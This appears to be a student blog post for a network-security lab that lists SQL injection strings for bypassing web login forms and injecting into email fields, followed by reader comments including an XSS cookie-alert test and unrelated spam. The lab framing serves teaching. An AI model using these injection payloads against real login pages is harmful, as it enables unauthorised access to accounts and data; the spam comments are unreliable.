SQL Injection (Lab 8 Network Security)

In this lab, you have to bypass web login authentication process by using SQL injection. And, you need to list down 10 SQL injection codes.

*****************************************

 

SQL Injection 101, Login tricks

  • admin’ —
  • admin’ #
  • admin’/*
  • ‘ or 1=1–
  • ‘ or 1=1#
  • ‘ or 1=1/*
  • ‘) or ‘1’=’1–
  • ‘) or (‘1’=’1–
  • Username : admin Password : 1234 ‘ AND 1=0 UNION ALL SELECT ‘admin’, ’81dc9bdb52d04dc20036dbd8313ed055

 

For email injection:

  1. x’ AND email IS NULL; —
  2. x’ AND userid IS NULL; —
  3. x’ OR full_name LIKE ‘%Bob%

 

Since our campus websense block certain SQL injection tutorial, here is the offline copy.

  1. SQL Injection Attacks by Example.pdf
  2. http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/#ByPassingLoginScreens
  1. nice info thx man

    • John
    • February 1st, 2012

    alert(document.cookie);

    • John
    • February 1st, 2012

    A

    • John
    • February 1st, 2012

    AB

  2. I’ve read some excellent stuff here. Certainly value bookmarking for revisiting. I wonder how a lot effort you place to create this sort of fantastic informative website.

  3. There are total of 200 recipes on the cookbook which
    are created to aid you make the most muscle gain from your existing workout routine.

  4. Some took a small longer, due to the fact that they have had the skin disease for
    a lot of years.

  5. Ex Girlfriend Guru involves a step by step blueprint on what to do, say and
    how you can act whenever you eventually meet up with your ex boyfriend.

  6. It tells you what to do if you grow to be anxious in social circumstances.

  1. No trackbacks yet.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: